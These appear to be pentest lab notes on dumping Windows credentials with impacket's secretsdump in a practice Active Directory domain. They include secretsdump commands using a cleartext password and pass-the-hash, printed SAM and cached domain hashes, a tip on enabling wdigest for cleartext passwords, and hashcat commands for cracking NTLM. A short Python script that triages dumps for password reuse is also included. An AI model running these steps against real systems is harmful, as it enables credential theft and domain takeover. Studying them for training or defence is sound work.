secretsdump.py MARVEL.local/fcastle:'Password1'@192.168.218.139
What to worry about from output:
- The SAM hashes
- Admin accounts and user accounts, NOT default ones
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
(NO)DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
(NO)WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58aae1f3031535bbb1bc1f63b3c31373:::
frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
- Domain logon hashes (cached domain credentials, DCC2 format)
- if you can get them and crack them, you can get the password of a domain admin
[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2023-10-05 03:17:32)
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2023-10-05 02:43:14)
- Clear text passwords!
- wdigest (stores credentials in clear text)
- Windows 7, Windows 8, Windows Server 2008, 2008 R2, Windows Server 2012
- You can enable this on older machines/OS!
- If you turn it on in a PenTest, turn it off before you leave so they don’t get screwed.
USE SECRETS DUMP ON ALL MACHINES YOU HAVE ACCESS TO!!!!
secretsdump.py MARVEL.local/fcastle:'Password1'@192.168.218.140 #on Spiderman
gives us ANOTHER SAM hash that we did not have before this!
peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
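Added example (not part of these notes or of impacket itself): a small Python triage script for the SAM section of secretsdump output in the uid:rid:lmhash:nthash format shown above. It skips the normally disabled built-in accounts, flags stored LM hashes and blank-password accounts, and reports one NT hash turning up under several accounts or hosts (the frankcastle and peterparker lines above have identical NT hashes, i.e. the same password). Host names and hash values in the sample dumps are constructed, not real output.

```python
import re
from collections import defaultdict

# LM field secretsdump prints when no LM hash is stored, and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
DISABLED_BUILTIN_RIDS = {501, 503}  # Guest, DefaultAccount: normally disabled, blank hash expected
SAM_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

def parse_sam(text):
    """Parse 'uid:rid:lmhash:nthash:::' lines; '[*]' status lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = SAM_LINE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries

def triage(dumps):
    """dumps maps host -> raw secretsdump SAM output. Returns (finding, subject) tuples."""
    findings = []
    accounts_by_nt = defaultdict(list)
    for host, text in dumps.items():
        for e in parse_sam(text):
            label = f"{host}\\{e['user']}"
            if e["lm"] != EMPTY_LM:            # a real LM hash is stored: trivially crackable
                findings.append(("lm_hash_stored", label))
            if e["nt"] == EMPTY_NT:            # blank password
                if e["rid"] not in DISABLED_BUILTIN_RIDS:
                    findings.append(("empty_password", label))
                continue                       # do not count blank passwords as "reuse"
            accounts_by_nt[e["nt"]].append(label)
    for accounts in accounts_by_nt.values():
        if len(accounts) > 1:                  # same NT hash = same password across users/hosts
            findings.append(("hash_reuse", tuple(sorted(accounts))))
    return findings

# Constructed sample dumps for two hosts (hash values are made up, not from a real system).
SAMPLE_DUMPS = {
    "192.168.218.139": """[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::""",
    "192.168.218.140": """[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
peterparker:1001:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
svc_backup:1002:44444444444444444444444444444444:31d6cfe0d16ae931b73c59d7e0c089c0:::""",
}
FINDINGS = triage(SAMPLE_DUMPS)
```

Run it on the real files by reading each host's secretsdump output into the dict in place of SAMPLE_DUMPS; the "hash_reuse" findings are where a shared local admin password or a reused user password shows up.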
SECRETS DUMP WITH A HASH:
secretsdump.py administrator:@192.168.218.139 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
EXAMPLE OF HOW TO MAKE THIS USEFUL:
Cracking the hash(es):
hashcat:
hashcat --help | grep NTLM
or grep for any other hash type instead of NTLM to find its mode number.
NTLM is 1000 in this case:
hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt #add -O (optimized kernels) if running on real hardware, not a VM
-m selects the hash mode (type); the value is the number we found in the step before